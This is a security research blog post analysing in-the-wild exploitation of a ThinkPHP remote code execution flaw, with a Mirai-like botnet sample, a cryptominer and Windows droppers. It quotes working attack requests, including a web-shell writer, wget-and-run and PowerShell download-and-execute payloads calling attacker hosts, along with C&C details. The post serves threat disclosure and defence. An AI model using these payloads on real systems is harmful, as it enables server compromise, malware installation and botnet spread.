Need cloud computing? Get started now

Dark background with blue code overlay
Blog
RSS

ThinkPHP Exploit Actively Exploited in the Wild

Larry Cashdollar

Written by

Larry Cashdollar

May 26, 2021

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

While investigating the recent Magecart card skimming attacks, I came across a payload I was not familiar with.  Further research into it lead me to discover that in December a researcher disclosed a remote command execution vulnerability in ThinkPHP, a web framework by TopThink.

The developers fixed the vulnerability stating that because "the framework does not detect the controller name enough, it may lead to possible 'getshell' vulnerabilities without the forced routing enabled." It appears that the code does not properly sanitize user input allowing an unauthenticated user to specify their own filter function to execute.  The vulnerability has been assigned CVE-2018-20062.

There are multiple actors abusing this flaw to install everything from a Mirai like botnet to Microsoft Windows malware.

Currently we're seeing  widespread scanning for the ThinkPHP vulnerability. Threat actors are performing one of many simple checks. The variation I've observed the most is the following:

s=index/thinkpp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=var_dump(md5(123))

If the server is vulnerable, the value string(32) "202cb962ac59075b964b07152d234b70"is printed or var_dump(md5(123)).  Also, in some of these checks, the User-Agent string is spoofed to look like a legitimate connection from Baidu:

Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html

Other payload variations include attempts to upload a web shell backdoor, install crypto currency mining software, and Microsoft Windows malware.

s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php eval($_POST[dong]);?>' > cnm.php

This will write a file named cnm.php with the contents of <?php eval($POST[dong]);?>.  POST requests to that file with php code in the variable dong will be executed.

IoT botnets are also using this vulnerability to spread their malware.  A sample I captured called "dark.x86", is malware written in C that uses cnc.santaiot.net as its command and control server.

$ file dark.x86 dark.x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped $ sha256sum dark.x86

d06419d1b2c5b75ae61b0f165260be98b6280e196cc948640d6decd0e9a44c44  dark.x86

After execution, it changes its process from dark.x86 to a string of 16 characters:

prctl(PR_SET_NAME, "KtKKDocAdAKKotto"...) = 0

Then, it writes the string "xan bar extra Ganja" to stderr:

write(1, "xan bar extra Ganja\0", 20xan bar extra Ganja)   = 20

The malware uses Google's DNS server at 8.8.8.8 for DNS resolution, rather than what is in /etc/resolv.conf. A connection to port 23 is also attempted for IP address 176.123.26.89

which resolves to mx5.adseto.com. It seems to be scanning for open telnet ports. All outbound connections in my malware lab are blocked, however. The malware also listens on two ports: one TCP bound to localhost on port 17384, and one UDP bound all interfaces on a random high port > 32000.

bind(3, {sa_family=AF_INET, sin_port=htons(17384), sin_addr=inet_addr("127.0.0.1")}, 16) = 0

getsockname(4, {sa_family=AF_INET, sin_port=htons(46655), sin_addr=inet_addr("0.0.0.0")}, [16]) = 0

The malware connects to the C&C server via TCP port 39215,  a telnet session established with that port presents the user with a command prompt:

$ telnet 167.99.219.142 39215

Prompt:

Translates to, "User name".

After hitting the h key:

Translates to, "Your hoping to hack what kind of router?"  Thanks to @malwaremustdie for translation.

In regard to the payloads outlined above, it appears the Linux infections build a botnet with lot of similarities to Mirai.  Windows infections appear to be involved in Crypto Mining activities, trojans, and additional features such as windows password cracking capabilities.

Further analysis of the dark.x86 linux malware reveals the following properties:

  • scanner and exploitation component

  • targets linux hosts

  • seems to be a Mirai variant

  • uses string obfuscation (xor w/ key 0x04)

Scanning/infection payload:

.rodata:0804F58C aGetIndex_php?s db 'GET /index.php?s=/index/\think\app/invokefunction&function=call_u'

.rodata:0804F58C                                         ; DATA XREF: sub_804B690+69Bo

.rodata:0804F58C                 db 'ser_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http'

.rodata:0804F58C                 db '://167.99.219.142/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1',0Dh

.rodata:0804F58C                 db 0Ah

.rodata:0804F58C                 db 'Host: 127.0.0.1',0Dh,0Ah

.rodata:0804F58C                 db 'User-Agent: Sefa',0Dh,0Ah

.rodata:0804F58C                 db 'Accept: */*',0Dh,0Ah

.rodata:0804F58C                 db 'Accept-Language: en-US,en;q=0.8',0Dh,0Ah

.rodata:0804F58C                 db 'Connection: Keep-Alive',0Dh,0Ah

.rodata:0804F58C                 db 0Dh,0Ah,0

Decryption process:

String deobfuscation process

Strings are decrypted in memory

Data structure:

[obfuscated string][xor key][null delim]

.rodata:0804F6BC unk_804F6BC     db  7Ch ; |             ; DATA XREF: sub_804BFE0+12o

.rodata:0804F6BD                 db 65h ; e

.rodata:0804F6BE                 db 6Ah ; j

.rodata:0804F6BF                 db 24h ; $

.rodata:0804F6C0                 db 66h ; f

.rodata:0804F6C1                 db 65h ; e

.rodata:0804F6C2                 db 76h ; v

.rodata:0804F6C3                 db 24h ; $

.rodata:0804F6C4                 db 61h ; a

.rodata:0804F6C5                 db 7Ch ; |

.rodata:0804F6C6                 db 70h ; p

.rodata:0804F6C7                 db 76h ; v

.rodata:0804F6C8                 db 65h ; e

.rodata:0804F6C9                 db 24h ; $

.rodata:0804F6CA                 db 43h ; C

.rodata:0804F6CB                 db 65h ; e

.rodata:0804F6CC                 db 6Ah ; j

.rodata:0804F6CD                 db 6Eh ; n

.rodata:0804F6CE                 db 65h ; e

.rodata:0804F6CF                 db 4

.rodata:0804F6D0                 db 0

Decryptor:

$ cat test_xor.py

#!/usr/local/bin/python


import sys


bin = "7C656A2466657624617C7076652443656A6E65".decode('hex')


for b in bin:

   sys.stdout.write(chr(ord(b) ^ 0x04))

$ ./test_xor.py

xan bar extra Ganja

Obfuscated (hex)

Deobfuscated (ascii)

7C656A2466657624617C7076652443656A6E65

2B74766B672B

2B617C61

2B6260

2B696A70

2B777065707177

2B74766B672B6A61702B706774

2B676960686D6A61

2B7069742B

2B606570652B686B6765682B706974

75707C666B70

2A

657669

7C3C32

776C30

696D7477

69747768

776065

697060

666B702659

776C616868

616A65666861

777D77706169

776C

66656C

7770657670

2B666D6A2B6671777D666B7C244045564F

4045564F3E24657474686170246A6B7024626B716A60

6A676B7676616770

6B636D6A

657777736B7660

616A706176

2B6061722B736570676C606B63

2B6061722B696D77672B736570676C606B63

2B77666D6A2B736570676C606B63

2B666D6A2B736570676C606B63

2B6061722B42505340503534355B736570676C606B63

2B6061722B42505340503534352B736570676C606B63

2B6061722B736570676C606B6334

2B6170672B606162657168702B736570676C606B63

2B6170672B736570676C606B63

4045564F606B63617067

676A672A77656A70656D6B702A6A6170

9D2B

7767656A2A77656A70656D6B702A6A6170

xan bar extra Ganja

/proc/

/exe

/fd

/mnt

/status

/proc/net/tcp

/cmdline

/tmp/

/data/local/tmp

qtxbot

arm

x86

sh4

mips

mpsl

sda

mtd

bot"]

shell

enable

system

sh

bah

start

/bin/busybox DARK

DARK: applet not found

ncorrect

ogin

assword

enter

/dev/watchdog

/dev/misc/watchdog

/sbin/watchdog

/bin/watchdog

/dev/FTWDT101_watchdog

/dev/FTWDT101/watchdog

/dev/watchdog0

/etc/default/watchdog

/etc/watchdog

DARKdogetc

cnc.santaiot.net

scan.santaiot.net



Other listening ports were ssh, httpd, and ftpd, which were likely used to download the malware from the C&C server.  An nmap scan shows anonymous logins are enabled for the ftp server.

Starting Nmap 7.60 ( https://nmap.org ) at 2019-01-03 15:04 UTC

Nmap scan report for 167.99.219.142

Host is up (0.094s latency).

Not shown: 996 closed ports

PORT     STATE SERVICE VERSION

21/tcp   open ftp     vsftpd 2.2.2

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_drwxr-xr-x    2 0 0        4096 Mar 22 2017 pub

| ftp-syst:

|   STAT:

| FTP server status:

|      Connected to x.x.x.x

|      Logged in as ftp

|      TYPE: ASCII

|      Session bandwidth limit in byte/s is 2048000

|      Session timeout in seconds is 300

|      Control connection is plain text

|      Data connections will be plain text

|      At session startup, client count was 5

|      vsFTPd 2.2.2 - secure, fast, stable

|_End of status

22/tcp   open ssh     OpenSSH 5.3 (protocol 2.0)

| ssh-hostkey:

|   1024 16:96:18:47:e6:15:f4:5f:c9:3d:6d:2a:ba:04:2e:9d (DSA)

|_  2048 f9:e4:db:0d:10:93:31:60:5b:43:84:5d:b6:93:1f:39 (RSA)

80/tcp   open http    Apache httpd 2.2.15 ((CentOS))

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Apache/2.2.15 (CentOS)

|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

3306/tcp open  mysql MySQL (unauthorized)

Device type: general purpose

Running: Linux 2.6.X|3.X

OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3

OS details: Linux 2.6.32 - 3.10

Network Distance: 11 hops

Service Info: OS: Unix

Shortly after my nmap and telnet probes, all services except sshd on the C&C server were closed.

Cryptocurrency miner

s=index/think%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20hxxp://27.98.193.224:8080/

Going the page above will display a file download app called HttpFileServer with xmrig and the accompanying config.json file.

The HttpFileServer binary itself can be downloaded from the link and is flagged as malware.

hfs.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

8100a67912642350ae935976103d688375f46afab0a3e9ac8a1d05da979c9ac7  hfs.exe

The Config.json contains the pool/user/password information.

"url": "mine.c3pool.com:13333",

           "user": "49KDPG8ft6ChpZd4X81fTBSmByrqQccjwTHWrT2KtHhaRTE6BNP1JFR9fuavHnj5NcEQuXmLDBki7Y3AKvvZdEtPTT8BgrG",

           "pass": "x",

screencapture

Windows malware

There is also a Microsoft Windows executable that is being uploaded.  It appears to have the following capabilities:

Download.exe is a dropper file that then downloads mscteui.exe.  A rudimentary examination of the mscteui.exe binary showed it contained functions for the following features:

  1. Mimkatz credential harvesting.

  2. SYN flood attack capabilities.

  3. SPAM or Phishing ability.

  4. Mirai like list of default login credentials.

  5. Data Exfiltration.

Formal analysis has been provided by various anti-virus and malware analysis vendors.

 I've listed the links to Joe's Sandbox analysis below.

Published analysis:

Binary

Report  

       Summary

download.exe: 8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec 

https://www.joesandbox.com/analysis/102164/0/html


  • Trojan

  • Backdoor

mscteui.exe: 1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27

https://www.joesandbox.com/analysis/97771/0/html

  • Trojan

  • Cryptominer

  • Backdoor

hfs.exe: 8100a67912642350ae935976103d688375f46afab0a3e9ac8a1d05da979c9ac7

https://www.joesandbox.com/analysis/101658/0/html

  • Trojan


The Windows malware is downloaded and executed via powershell:  

s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://a46.bulehero.in/download.exe','C:/12.exe');start C:/12.exe
 

New botnets

Twitter user @ankit_anwar discovered  a new IoT botnet dubbed "LARRY" abusing the ThinkPHP vulnerability to infect its victims.  I have not seen samples of the malware myself however.

Attack origin

Analysing a sample from the last 7 days the majority of IP addresses are from the Asia Pacific region.  This correlates with the origin of the ThinkPHP framework and its popularity in that region.

The majority of the attacking IPs are compromised web servers, routers and, IoT devices.

Conclusion

There is so much attack traffic, and so many ways to hide, criminals no longer worry about the tracks they've left behind. The goal now is to get command execution as any user, on any type of system, to either spread a botnet, distribute malware, or mine cryptocurrency. We will see more cross-pollination of command execution vulnerabilities in web apps, enterprise software, and IoT devices being used against multiple target platforms. There are also reports of WordPress plugin vulnerabilities making their way into the IoT exploitation swiss army knife.



Larry Cashdollar

Written by

Larry Cashdollar

May 26, 2021

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.